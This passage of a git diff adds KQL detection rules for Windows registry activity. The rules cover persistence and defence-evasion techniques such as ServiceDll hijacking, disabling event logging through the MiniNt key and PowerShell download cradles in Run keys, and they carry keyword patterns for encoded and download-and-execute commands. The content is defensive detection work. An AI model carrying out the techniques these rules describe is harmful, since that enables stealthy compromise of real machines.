"nbcojefnccbanplpoffopkoepjmhgdgh" or RegistryKey contains "majdfhpaihoncoakbjgbdhglocklcgno" or RegistryKey contains "lnfdmdhmfbimhhpaeocncdlhiodoblbd" or RegistryKey contains "eppiocemhmnlbhjplcgkofciiegomcon" or RegistryKey contains "cocfojppfigjeefejbpfmedgjbpchcng" or RegistryKey contains "foiopecknacmiihiocgdjgbjokkpkohc" or RegistryKey contains "hhdobjgopfphlmjbmnpglhfcgppchgje" or RegistryKey contains "jgbaghohigdbgbolncodkdlpenhcmcge" or RegistryKey contains "inligpkjkhbpifecbdjhmdpcfhnlelja" or RegistryKey contains "higioemojdadgdbhbbbkfbebbdlfjbip" or RegistryKey contains "hipncndjamdcmphkgngojegjblibadbe" or RegistryKey contains "iolonopooapdagdemdoaihahlfkncfgg" or RegistryKey contains "nhfjkakglbnnpkpldhjmpmmfefifedcj" or RegistryKey contains "jpgljfpmoofbmlieejglhonfofmahini" or RegistryKey contains "fgddmllnllkalaagkghckoinaemmogpe" or RegistryKey contains "ejkaocphofnobjdedneohbbiilggdlbi" or RegistryKey contains "keodbianoliadkoelloecbhllnpiocoi" or RegistryKey contains "hoapmlpnmpaehilehggglehfdlnoegck" or RegistryKey contains "poeojclicodamonabcabmapamjkkmnnk" or RegistryKey contains "dfkdflfgjdajbhocmfjolpjbebdkcjog" or RegistryKey contains "kcdahmgmaagjhocpipbodaokikjkampi" or RegistryKey contains "klnkiajpmpkkkgpgbogmcgfjhdoljacg" or RegistryKey contains "lneaocagcijjdpkcabeanfpdbmapcjjg" or RegistryKey contains "pgfpignfckbloagkfnamnolkeaecfgfh" or RegistryKey contains "jplnlifepflhkbkgonidnobkakhmpnmh" or RegistryKey contains "jliodmnojccaloajphkingdnpljdhdok" or RegistryKey contains "hnmpcagpplmpfojmgmnngilcnanddlhb" or RegistryKey contains "ffbkglfijbcbgblgflchnbphjdllaogb" or RegistryKey contains "kcndmbbelllkmioekdagahekgimemejo" or RegistryKey contains "jdgilggpfmjpbodmhndmhojklgfdlhob" or RegistryKey contains "bihhflimonbpcfagfadcnbbdngpopnjb" or RegistryKey contains "ppajinakbfocjfnijggfndbdmjggcmde" or RegistryKey contains "oofgbpoabipfcfjapgnbbjjaenockbdp" or RegistryKey contains "bhnhkdgoefpmekcgnccpnhjfdgicfebm" or RegistryKey contains "knmmpciebaoojcpjjoeonlcjacjopcpf" or RegistryKey contains "dhadilbmmjiooceioladdphemaliiobo" or RegistryKey contains "jedieiamjmoflcknjdjhpieklepfglin" or RegistryKey contains "mhngpdlhojliikfknhfaglpnddniijfh" or RegistryKey contains "omdakjcmkglenbhjadbccaookpfjihpa" or RegistryKey contains "npgimkapccfidfkfoklhpkgmhgfejhbj" or RegistryKey contains "akeehkgglkmpapdnanoochpfmeghfdln" or RegistryKey contains "gbmdmipapolaohpinhblmcnpmmlgfgje" or RegistryKey contains "aigmfoeogfnljhnofglledbhhfegannp" or RegistryKey contains "cgojmfochfikphincbhokimmmjenhhgk" or RegistryKey contains "ficajfeojakddincjafebjmfiefcmanc" or RegistryKey contains "ifnaibldjfdmaipaddffmgcmekjhiloa" or RegistryKey contains "jbnmpdkcfkochpanomnkhnafobppmccn" or RegistryKey contains "apcfdffemoinopelidncddjbhkiblecc" or RegistryKey contains "mjolnodfokkkaichkcjipfgblbfgojpa" or RegistryKey contains "oifjbnnafapeiknapihcmpeodaeblbkn" or RegistryKey contains "plpmggfglncceinmilojdkiijhmajkjh" or RegistryKey contains "mjnbclmflcpookeapghfhapeffmpodij" or RegistryKey contains "bblcccknbdbplgmdjnnikffefhdlobhp" or RegistryKey contains "aojlhgbkmkahabcmcpifbolnoichfeep" or RegistryKey contains "lcmammnjlbmlbcaniggmlejfjpjagiia" or RegistryKey contains "knajdeaocbpmfghhmijicidfcmdgbdpm" or RegistryKey contains "bdlcnpceagnkjnjlbbbcepohejbheilk" or RegistryKey contains "edknjdjielmpdlnllkdmaghlbpnmjmgb" or RegistryKey contains "eidnihaadmmancegllknfbliaijfmkgo" or RegistryKey contains "ckiahbcmlmkpfiijecbpflfahoimklke" or RegistryKey contains "macdlemfnignjhclfcfichcdhiomgjjb" or RegistryKey contains "chioafkonnhbpajpengbalkececleldf" or RegistryKey contains "amnoibeflfphhplmckdbiajkjaoomgnj" or RegistryKey contains "llbhddikeonkpbhpncnhialfbpnilcnc" or RegistryKey contains "pcienlhnoficegnepejpfiklggkioccm" or RegistryKey contains "iocnglnmfkgfedpcemdflhkchokkfeii" or RegistryKey contains "igahhbkcppaollcjeaaoapkijbnphfhb" or RegistryKey contains "njpmifchgidinihmijhcfpbdmglecdlb" or RegistryKey contains "ggackgngljinccllcmbgnpgpllcjepgc" or RegistryKey contains "kchocjcihdgkoplngjemhpplmmloanja" or RegistryKey contains "bnijmipndnicefcdbhgcjoognndbgkep" or RegistryKey contains "lklekjodgannjcccdlbicoamibgbdnmi" or RegistryKey contains "dbdbnchagbkhknegmhgikkleoogjcfge" or RegistryKey contains "egblhcjfjmbjajhjhpmnlekffgaemgfh" or RegistryKey contains "ehbhfpfdkmhcpaehaooegfdflljcnfec" or RegistryKey contains "bkkgdjpomdnfemhhkalfkogckjdkcjkg" or RegistryKey contains "almalgbpmcfpdaopimbdchdliminoign" or RegistryKey contains "akkbkhnikoeojlhiiomohpdnkhbkhieh" or RegistryKey contains "gbfgfbopcfokdpkdigfmoeaajfmpkbnh" or RegistryKey contains "bniikohfmajhdcffljgfeiklcbgffppl" or RegistryKey contains "lejgfmmlngaigdmmikblappdafcmkndb" or RegistryKey contains "ffhhkmlgedgcliajaedapkdfigdobcif" or RegistryKey contains "gcknhkkoolaabfmlnjonogaaifnjlfnp" or RegistryKey contains "pooljnboifbodgifngpppfklhifechoe" or RegistryKey contains "fjoaledfpmneenckfbpdfhkmimnjocfa" or RegistryKey contains "aakchaleigkohafkfjfjbblobjifikek" or RegistryKey contains "dpplabbmogkhghncfbfdeeokoefdjegm" or RegistryKey contains "padekgcemlokbadohgkifijomclgjgif" or RegistryKey contains "bfidboloedlamgdmenmlbipfnccokknp")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/scheduled_taskcache_change_by_uncommon_program.kql b/KQL/rules/windows/registry/registry_set/scheduled_taskcache_change_by_uncommon_program.kql
new file mode 100644
index 00000000..8358e184
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/scheduled_taskcache_change_by_uncommon_program.kql
@@ -0,0 +1,10 @@
+// Title: Scheduled TaskCache Change by Uncommon Program
+// Author: Syed Hasan (@syedhasan009)
+// Date: 2021-06-18
+// Level: high
+// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache*" and (not((RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor*") or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\MoUsoCoreWorker.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe" or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework" and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN")) or isnull(RegistryValueData) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe", "C:\\Program Files (x86)\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe")) or (RegistryKey contains "Microsoft\\Windows\\UpdateOrchestrator" or RegistryKey contains "Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index" or RegistryKey contains "Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe" or InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe" or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe", "C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe")) or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/screensaver_registry_key_set.kql b/KQL/rules/windows/registry/registry_set/screensaver_registry_key_set.kql
new file mode 100644
index 00000000..5f65fc7f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/screensaver_registry_key_set.kql
@@ -0,0 +1,12 @@
+// Title: ScreenSaver Registry Key Set
+// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
+// Date: 2022-05-04
+// Level: medium
+// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+//   - Legitimate use of screen saver
+
+DeviceRegistryEvents
+| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (RegistryValueData endswith ".scr" and RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE") and (not((RegistryValueData contains "C:\\Windows\\System32\\" or RegistryValueData contains "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/scripted_diagnostics_turn_off_check_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/scripted_diagnostics_turn_off_check_enabled_registry.kql
new file mode 100644
index 00000000..3ee13923
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/scripted_diagnostics_turn_off_check_enabled_registry.kql
@@ -0,0 +1,12 @@
+// Title: Scripted Diagnostics Turn Off Check Enabled - Registry
+// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+// Date: 2022-06-15
+// Level: medium
+// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Administrator actions
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/security_event_logging_disabled_via_minint_registry_key_registry_set.kql b/KQL/rules/windows/registry/registry_set/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
new file mode 100644
index 00000000..68a7bdb7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/security_event_logging_disabled_via_minint_registry_key_registry_set.kql
@@ -0,0 +1,14 @@
+// Title: Security Event Logging Disabled via MiniNt Registry Key - Registry Set
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-09
+// Level: high
+// Description: Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events.
+// Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing.
+// Adversary may want to disable this service to disable logging of security events which could be used to detect their activities.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001
+// False Positives:
+//   - Highly Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\MiniNt\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/service_binary_in_suspicious_folder.kql b/KQL/rules/windows/registry/registry_set/service_binary_in_suspicious_folder.kql
new file mode 100644
index 00000000..55e28560
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/service_binary_in_suspicious_folder.kql
@@ -0,0 +1,10 @@
+// Title: Service Binary in Suspicious Folder
+// Author: Florian Roth (Nextron Systems), frack113
+// Date: 2022-05-02
+// Level: high
+// Description: Detect the creation of a service with a service binary located in a suspicious directory
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where (((RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\") and RegistryKey endswith "\\ImagePath" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\") and RegistryKey endswith "\\Start" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services*")) and (not(((InitiatingProcessFolderPath contains "\\Common Files\\" and InitiatingProcessFolderPath contains "\\Temp\\") or (RegistryValueData endswith "\\AppData\\Local\\Temp\\MBAMInstallerService.exe\"" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\services.exe" and RegistryKey endswith "\\CurrentControlSet\\Services\\MBAMInstallerService\\ImagePath"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/servicedll_hijack.kql b/KQL/rules/windows/registry/registry_set/servicedll_hijack.kql
new file mode 100644
index 00000000..372f8f5f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/servicedll_hijack.kql
@@ -0,0 +1,14 @@
+// Title: ServiceDll Hijack
+// Author: frack113
+// Date: 2022-02-04
+// Level: medium
+// Description: Detects changes to the "ServiceDLL" value related to a service in the registry.
+// This is often used as a method of persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+//   - Administrative scripts
+//   - Installation of a service
+
+DeviceRegistryEvents
+| where ((RegistryKey endswith "\\System*" and RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/session_manager_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/session_manager_autorun_keys_modification.kql
new file mode 100644
index 00000000..1a5cf50c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/session_manager_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Session Manager Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, attack.t1546.009
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\System\\CurrentControlSet\\Control\\Session Manager" and (RegistryKey contains "\\SetupExecute" or RegistryKey contains "\\S0InitialCommand" or RegistryKey contains "\\KnownDlls" or RegistryKey contains "\\Execute" or RegistryKey contains "\\BootExecute" or RegistryKey contains "\\AppCertDlls") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_application_allowed_through_exploit_guard.kql b/KQL/rules/windows/registry/registry_set/suspicious_application_allowed_through_exploit_guard.kql
new file mode 100644
index 00000000..23296f4e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_application_allowed_through_exploit_guard.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Application Allowed Through Exploit Guard
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications" and (RegistryKey endswith "\\Users\\Public*" or RegistryKey endswith "\\AppData\\Local\\Temp*" or RegistryKey endswith "\\Desktop*" or RegistryKey endswith "\\PerfLogs*" or RegistryKey endswith "\\Windows\\Temp*")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_environment_variable_has_been_registered.kql b/KQL/rules/windows/registry/registry_set/suspicious_environment_variable_has_been_registered.kql
new file mode 100644
index 00000000..b9fae231
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_environment_variable_has_been_registered.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Environment Variable Has Been Registered
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-20
+// Level: high
+// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence
+
+DeviceRegistryEvents
+| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey endswith "\\Environment*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql b/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
new file mode 100644
index 00000000..5d665765
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: high
+// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoggedon" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\PsPing" or RegistryKey contains "\\PsService" or RegistryKey contains "\\SDelete") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\PsPing.exe" or InitiatingProcessFolderPath endswith "\\PsPing64.exe" or InitiatingProcessFolderPath endswith "\\PsService.exe" or InitiatingProcessFolderPath endswith "\\PsService64.exe" or InitiatingProcessFolderPath endswith "\\sdelete.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_keyboard_layout_load.kql b/KQL/rules/windows/registry/registry_set/suspicious_keyboard_layout_load.kql
new file mode 100644
index 00000000..401bbb74
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_keyboard_layout_load.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Keyboard Layout Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-12
+// Level: medium
+// Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+//   - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "00000429" or RegistryValueData contains "00050429" or RegistryValueData contains "0000042a") and (RegistryKey endswith "\\Keyboard Layout\\Preload*" or RegistryKey endswith "\\Keyboard Layout\\Substitutes*")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/windows/registry/registry_set/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql
new file mode 100644
index 00000000..b539e5e4
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Path In Keyboard Layout IME File Registry Value
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-21
+// Level: high
+// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_powershell_in_registry_run_keys.kql b/KQL/rules/windows/registry/registry_set/suspicious_powershell_in_registry_run_keys.kql
new file mode 100644
index 00000000..c8a50768
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_powershell_in_registry_run_keys.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell In Registry Run Keys
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-03-17
+// Level: medium
+// Description: Detects potential PowerShell commands or code within registry run keys
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate admin or third party scripts. Baseline according to your environment
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh " or RegistryValueData contains "FromBase64String" or RegistryValueData contains ".DownloadFile(" or RegistryValueData contains ".DownloadString(" or RegistryValueData contains " -w hidden " or RegistryValueData contains " -w 1 " or RegistryValueData contains "-windowstyle hidden" or RegistryValueData contains "-window hidden" or RegistryValueData contains " -nop " or RegistryValueData contains " -encodedcommand " or RegistryValueData contains "-ExecutionPolicy Bypass" or RegistryValueData contains "Invoke-Expression" or RegistryValueData contains "IEX (" or RegistryValueData contains "Invoke-Command" or RegistryValueData contains "ICM -" or RegistryValueData contains "Invoke-WebRequest" or RegistryValueData contains "IWR " or RegistryValueData contains "Invoke-RestMethod" or RegistryValueData contains "IRM " or RegistryValueData contains " -noni " or RegistryValueData contains " -noninteractive ") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_printer_driver_empty_manufacturer.kql b/KQL/rules/windows/registry/registry_set/suspicious_printer_driver_empty_manufacturer.kql
new file mode 100644
index 00000000..72c85e6e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_printer_driver_empty_manufacturer.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Printer Driver Empty Manufacturer
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-01
+// Level: high
+// Description: Detects a suspicious printer driver installation with an empty Manufacturer value
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675
+// False Positives:
+//   - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "(Empty)" and (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers" and RegistryKey contains "\\Manufacturer")) and (not((RegistryKey endswith "\\CutePDF Writer v4.0*" or RegistryKey endswith "\\Version-3\\PDF24*" or (RegistryKey endswith "\\VNC Printer (PS)*" or RegistryKey endswith "\\VNC Printer (UD)*"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_service_installed.kql b/KQL/rules/windows/registry/registry_set/suspicious_service_installed.kql
new file mode 100644
index 00000000..d7f7bd5b
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_service_installed.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Service Installed
+// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
+// Date: 2019-04-08
+// Level: medium
+// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.
+// Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1562.001, attack.defense-evasion
+// False Positives:
+//   - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it.
+
+DeviceRegistryEvents
